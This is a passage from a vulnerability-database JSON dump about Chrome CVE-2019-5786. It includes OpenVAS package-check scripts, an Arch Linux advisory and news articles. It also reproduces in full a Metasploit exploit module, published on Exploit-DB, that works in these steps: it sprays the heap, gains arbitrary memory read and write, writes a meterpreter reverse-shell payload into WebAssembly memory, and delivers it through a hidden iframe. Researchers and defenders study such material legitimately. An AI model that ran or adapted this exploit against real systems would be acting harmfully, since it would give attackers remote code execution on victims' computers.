online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - openSUSE Backports SLE-15:\n\n zypper in -t patch openSUSE-2019-298=1\n\n - SUSE Package Hub for SUSE Linux Enterprise 12:\n\n zypper in -t patch openSUSE-2019-298=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 42.3, openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~72.0.3626.121~202.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~72.0.3626.121~lp150.2.46.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", "CVE-2019-5782", "CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787", "CVE-2019-5774"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875626", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310875626", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-561eae4626", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875626\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5782\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", 
\"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\", \"CVE-2019-5801\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:12:35 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-561eae4626\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-561eae4626\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQOP53LXXPRGD4N5OBKGQTSMFXT32LF6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-561eae4626 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = 
isrpmvuln(pkg:\"chromium\", rpm:\"chromium~73.0.3683.75~2.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-05-08T20:20:52", "description": "", "published": "2019-05-08T00:00:00", "type": "exploitdb", "title": "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "EDB-ID:46812", "href": "https://www.exploit-db.com/exploits/46812", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',\r\n 'Description' => %q{\r\n This exploit takes advantage of a use after free vulnerability in Google\r\n Chrome 72.0.3626.119 running on Windows 7 x86.\r\n The FileReader.readAsArrayBuffer function can return multiple references to the\r\n same ArrayBuffer object, which can be freed and overwritten with sprayed objects.\r\n The dangling ArrayBuffer reference can be used to access the sprayed objects,\r\n allowing arbitrary memory access from Javascript. 
This is used to write and\r\n execute shellcode in a WebAssembly object.\r\n The shellcode is executed within the Chrome sandbox, so you must explicitly\r\n disable the sandbox for the payload to be successful.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Clement Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # Exodus Intel\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-5786'],\r\n ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],\r\n ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],\r\n ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],\r\n ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => 'windows',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Mar 21 2019'))\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Sending #{request.uri}\")\r\n if request.uri =~ %r{/exploit.html$}\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\nlet myWorker = new Worker('worker.js');\r\nlet reader = null;\r\nspray = null; // nested arrays used to hold the sprayed heap contents\r\nlet onprogress_cnt = 0; // number of times onprogress was called in a round\r\nlet try_cnt = 0; // number of rounds we tried\r\nlet last = 0, lastlast = 0; // last two AB results from the read\r\nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer\r\nconst string_size = 128 * 1024 * 1024;\r\nlet contents = String.prototype.repeat.call('Z', string_size);\r\nlet f = new File([contents], \"text.txt\");\r\nconst marker1 = 0x36313233;\r\nconst marker2 = 0x37414546;\r\n\r\nconst outers = 256;\r\nconst inners = 1024;\r\n\r\nfunction allocate_spray_holders() {\r\n spray = new Array(outers);\r\n 
for (let i = 0; i < outers; i++) {\r\n spray[i] = new Array(inners);\r\n }\r\n}\r\n\r\nfunction clear_spray() {\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j++) {\r\n spray[i][j] = null;\r\n }\r\n }\r\n}\r\n\r\nfunction reclaim_mixed() {\r\n // spray the heap to reclaim the freed region\r\n let tmp = {};\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n spray[i][j] = {a: marker1, b: marker2, c: tmp};\r\n spray[i][j].c = spray[i][j] // self-reference to find our absolute address\r\n spray[i][j+1] = new Array(8);\r\n spray[i][j+2] = new Uint32Array(32);\r\n }\r\n }\r\n}\r\n\r\nfunction find_pattern() {\r\n const start_offset = 0x00afc000 / 4;\r\n for (let i = start_offset; i + 1 < string_size / 4; i++) {\r\n if (i < 50){\r\n console.log(tarray[i].toString(16));\r\n }\r\n // multiply by two because of the way SMIs are stored\r\n if (tarray[i] == marker1 * 2) {\r\n if (tarray[i+1] == marker2 * 2) {\r\n console.log(`found possible candidate object at idx ${i}`);\r\n return i;\r\n }\r\n }\r\n }\r\n return null;\r\n}\r\n\r\n\r\nfunction get_obj_idx(prop_idx) {\r\n // find the index of the Object in the spray array\r\n tarray[prop_idx] = 0x62626262;\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j+=1) {\r\n try {\r\n if (spray[i][j].a == 0x31313131) {\r\n console.log(`found object idx in the spray array: ${i} ${j}`);\r\n return spray[i][j];\r\n }\r\n } catch (e) {}\r\n }\r\n }\r\n}\r\n\r\nfunction ta_read(addr) {\r\n // reads an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {\r\n return tarray[(addr-ta_absolute_addr)/4];\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nfunction ta_write(addr, value) {\r\n // write to an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr % 4 || value > 
2**32 - 1 ||\r\n addr < ta_absolute_addr ||\r\n addr > ta_absolute_addr + string_size) {\r\n console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);\r\n }\r\n tarray[(addr-ta_absolute_addr)/4] = value;\r\n}\r\n\r\nfunction get_corruptable_ui32a() {\r\n // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n let ui32a_addr = addrof(spray[i][j+2]) - 1;\r\n let bs_addr = ta_read(ui32a_addr + 12) - 1;\r\n let elements_addr = ta_read(ui32a_addr + 8) - 1;\r\n // read its elements pointer\r\n // if the elements ptr lies inside the region we have access to\r\n if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&\r\n elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {\r\n console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);\r\n return {\r\n bs_addr: bs_addr,\r\n elements_addr: elements_addr,\r\n ui32: spray[i][j+2],\r\n i: i, j: j\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nvar reader_obj = null;\r\nvar object_prop_taidx = null;\r\nvar ta_absolute_addr = null;\r\nvar aarw_ui32 = null;\r\n\r\nfunction addrof(leaked_obj) {\r\n reader_obj.a = leaked_obj;\r\n return tarray[object_prop_taidx];\r\n}\r\n\r\n\r\nfunction read4(addr) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n // rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n let val = aarw_ui32.ui32[0];\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n\r\n return val;\r\n}\r\n\r\nfunction write4(addr, val) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n 
// rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n aarw_ui32.ui32[0] = val;\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n}\r\n\r\nfunction get_rw() {\r\n // free up as much memory as possible\r\n // spray = null;\r\n // contents = null;\r\n force_gc();\r\n\r\n // attepmt reclaiming the memory pointed to by dangling pointer\r\n reclaim_mixed();\r\n\r\n // access the reclaimed region as a Uint32Array\r\n tarray = new Uint32Array(lastlast);\r\n object_prop_taidx = find_pattern();\r\n if (object_prop_taidx === null) {\r\n console.log('ERROR> failed to find marker');\r\n window.top.postMessage(`ERROR> failed to find marker`, '*');\r\n return;\r\n }\r\n\r\n // leak the absolute address of the Object\r\n const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential\r\n ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4\r\n console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);\r\n console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);\r\n\r\n reader_obj = get_obj_idx(object_prop_taidx);\r\n if (reader_obj == undefined) {\r\n console.log(`ERROR> failed to find object`);\r\n window.top.postMessage(`ERROR> failed to find object`, '*');\r\n return;\r\n }\r\n // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray\r\n\r\n console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);\r\n aarw_ui32 = get_corruptable_ui32a();\r\n // arbitrary read write up after this point\r\n}\r\n\r\nvar wfunc = null;\r\nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\");\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => console.log(arg) }\r\n };\r\n bc = [0x0, 
0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n wfunc = wasm_func;\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func) - 1;\r\n let sfi = read4(wasm_func_addr + 12) - 1;\r\n let WasmExportedFunctionData = read4(sfi + 4) - 1;\r\n let instance = read4(WasmExportedFunctionData + 8) - 1;\r\n let rwx_addr = read4(instance + 0x74);\r\n\r\n // write the shellcode to the RWX page\r\n if (meterpreter.length % 2 != 0)\r\n meterpreter += \"\\\\u9090\";\r\n\r\n for (let i = 0; i < meterpreter.length; i += 2) {\r\n write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);\r\n }\r\n\r\n // if we got to this point, the exploit was successful\r\n window.top.postMessage('SUCCESS', '*');\r\n console.log('success');\r\n wfunc();\r\n\r\n // invoke the shellcode\r\n //window.setTimeout(wfunc, 1000);\r\n}\r\n\r\nfunction force_gc() {\r\n // forces a garbage collection to avoid OOM kills\r\n try {\r\n var failure = new WebAssembly.Memory({initial: 32767});\r\n } catch(e) {\r\n // console.log(e.message);\r\n }\r\n}\r\n\r\nfunction init() {\r\n abs = [];\r\n tarray = 0;\r\n onprogress_cnt = 0;\r\n try_cnt = 0;\r\n last = 0, lastlast = 0;\r\n reader = new FileReader();\r\n\r\n reader.onloadend = function(evt) {\r\n try_cnt += 1;\r\n failure = false;\r\n if (onprogress_cnt < 2) {\r\n 
console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);\r\n failure = true;\r\n }\r\n\r\n if (lastlast.byteLength != f.size) {\r\n console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);\r\n failure = true;\r\n }\r\n\r\n if (failure === true) {\r\n console.log('retrying in 1 second');\r\n window.setTimeout(exploit, 1);\r\n return;\r\n }\r\n\r\n console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);\r\n try {\r\n // trigger the FREE\r\n myWorker.postMessage([last], [last, lastlast]);\r\n } catch(e) {\r\n // an exception with this message indicates that the FREE part of the exploit was successful\r\n if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {\r\n get_rw();\r\n rce();\r\n return;\r\n } else {\r\n console.log(e.message);\r\n }\r\n }\r\n }\r\n reader.onprogress = function(evt) {\r\n force_gc();\r\n let res = evt.target.result;\r\n // console.log(`onprogress ${onprogress_cnt}`);\r\n onprogress_cnt += 1;\r\n if (res.byteLength != f.size) {\r\n // console.log(`result has a different size than expected: ${res.byteLength}`);\r\n return;\r\n }\r\n lastlast = last;\r\n last = res;\r\n }\r\n if (spray === null) {\r\n // allocate the spray holders if needed\r\n allocate_spray_holders();\r\n }\r\n\r\n // clear the spray holder arrays\r\n clear_spray();\r\n\r\n // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit\r\n try {\r\n let failure = new ArrayBuffer(1024 * 1024 * 1024);\r\n } catch (e) {\r\n console.log(e.message);\r\n }\r\n\r\n force_gc();\r\n}\r\n\r\nfunction exploit() {\r\n init();\r\n reader.readAsArrayBuffer(f);\r\n console.log(`attempt ${try_cnt} started`);\r\n}\r\n </script>\r\n </head>\r\n <body onload=\"exploit()\">\r\n </body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n elsif request.uri =~ %r{/worker.js$}\r\n send_response(cli, 'onmessage = function (msg) { }')\r\n else\r\n uripath = 
datastore['URIPATH'] || get_resource\r\n uripath += '/' unless uripath.end_with? '/'\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\n function iter() {\r\n let iframe = null;\r\n try {\r\n iframe = document.getElementById('myframe');\r\n document.body.removeChild(iframe);\r\n } catch (e) {}\r\n\r\n iframe = document.createElement('iframe');\r\n iframe.src = '#{uripath}exploit.html';\r\n iframe.id = 'myframe';\r\n iframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\"\r\n document.body.appendChild(iframe);\r\n console.log(document.getElementById('myframe'));\r\n }\r\n\r\n function brute() {\r\n window.setTimeout(iter, 1000);\r\n let interval = window.setInterval(iter, 15000);\r\n\r\n window.onmessage = function(e) {\r\n if (e.data.includes('SUCCESS')) {\r\n console.log('exploit successful!');\r\n window.clearInterval(interval);\r\n }\r\n console.log(e);\r\n }\r\n }\r\n </script>\r\n </head>\r\n <body onload=\"brute()\"></body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46812"}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "Arch Linux Security Advisory ASA-201903-1\n=========================================\n\nSeverity: High\nDate : 2019-03-02\nCVE-ID : CVE-2019-5786\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-916\n\nSummary\n=======\n\nThe package chromium before version 72.0.3626.121-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 72.0.3626.121-1.\n\n# pacman -Syu \"chromium>=72.0.3626.121-1\"\n\nThe problem has been fixed upstream in version 72.0.3626.121.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free issue has been found in the FileReader component of\nthe chromium browser before 
72.0.3626.121.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code via a crafted file.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=936448\nhttps://security.archlinux.org/CVE-2019-5786", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "ASA-201903-1", "href": "https://security.archlinux.org/ASA-201903-1", "type": "archlinux", "title": "[ASA-201903-1] chromium: arbitrary code execution", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "thn": [{"lastseen": "2019-03-06T10:29:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "[](<https://1.bp.blogspot.com/-hYeL9HSrkr8/XH-YRFnQiNI/AAAAAAAAzdU/qJcBEPSf6D0nh6oxWhcwvfROeWNxLorjgCLcBGAs/s728-e100/chrome.png>)\n\nYou must update your Google Chrome immediately to the latest version of the web browsing application. \n \nSecurity researcher **Clement Lecigne** of Google's Threat Analysis Group discovered and reported a high severity vulnerability in Chrome late last month that could allow remote attackers to execute arbitrary code and take full control of the computers. \n \nThe vulnerability, assigned as [CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>), affects the web browsing software for all major operating systems including Microsoft Windows, Apple macOS, and Linux. \n\n\n \nWithout revealing technical details of the vulnerability, the Chrome security team only says the issue is a use-after-free vulnerability in the FileReader component of the Chrome browser, which leads to remote code execution attacks. \n \nWhat's more worrisome? Google warned that this zero-day RCE vulnerability is actively being exploited in the wild by attackers to target Chrome users. 
\n \n\n\n> \"Access to bug details and links may be [kept restricted](<https://bugs.chromium.org/p/chromium/issues/detail?id=936448>) until a majority of users are updated with a fix,\" the Chrome security team [notes](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>). \"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\"\n\n \nFileReader is a standard API that has been designed to allow web applications to asynchronously read the contents of files (or raw data buffers) stored on a user's computer, using 'File' or 'Blob' objects to specify the file or data to read. \n\n\n[](<https://1.bp.blogspot.com/-cDw0oW1O2XA/XH-UbocY50I/AAAAAAAAzdI/P271YPGjVvgMLh_q1IL4Eds2-dpp86SQACLcBGAs/s728-e100/update-download-google-chrome.png>)\n\nThe use-after-free vulnerability is a class of memory corruption bug that allows corruption or modification of data in memory, enabling an unprivileged user to escalate privileges on an affected system or software. \n\n\n \nThe use-after-free vulnerability in the FileReader component could enable unprivileged attackers to gain privileges on the Chrome web browser, allowing them to escape sandbox protections and run arbitrary code on the targeted system. \n \nIt appears to exploit this vulnerability, all an attacker needs to do is tricking victims into just opening, or redirecting them to, a specially-crafted webpage without requiring any further interaction. \n \nThe patch for the security vulnerability has already been rolled out to its users in a stable **Chrome update 72.0.3626.121** for Windows, Mac, and Linux operating systems, which users may have already receive or will soon receive in coming days. \n \nSo, make sure your system is running the updated version of the Chrome web browser. 
\n \nWe will update the article, as soon as Google releases technical details of this vulnerability.\n", "modified": "2019-03-06T09:52:57", "published": "2019-03-06T09:52:00", "id": "THN:9B9CD91CB050B48FE5802D55125DA161", "href": "https://thehackernews.com/2019/03/update-google-chrome-hack.html", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Found Actively Exploited in the Wild", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-29T17:36:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "[](<https://1.bp.blogspot.com/-PKdiogHzFeI/XIf0vqexEZI/AAAAAAAAzfs/p4e6mA-R0002aWC4T5QjStHpVJq7nTecACLcBGAs/s728-e100/microsoft-windows-security-updates.jpg>)\n\nIt's time for another batch of \"Patch Tuesday\" updates from Microsoft. \n \nMicrosoft today released its [March 2019 software updates](<https://portal.msrc.microsoft.com/en-us/security-guidance>) to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. \n \nThe update addresses flaws in Windows, Internet Explorer, Edge, MS Office, and MS Office SharePoint, ChakraCore, Skype for Business, and Visual Studio NuGet. \n \nFour of the security vulnerabilities, all rated important, patched by the tech giant this month were disclosed publicly, of which none were found exploited in the wild. \n \n\n\n## Microsoft Patches Two Zero-Day Flaws Under Active Attack\n\n \nMicrosoft has also patched two separate zero-day elevation of privilege vulnerabilities in Windows. \n\n\n \nBoth flaws, also rated as important, reside in Win32k component that hackers are actively exploiting in the wild, including the one that Google warned of last week. 
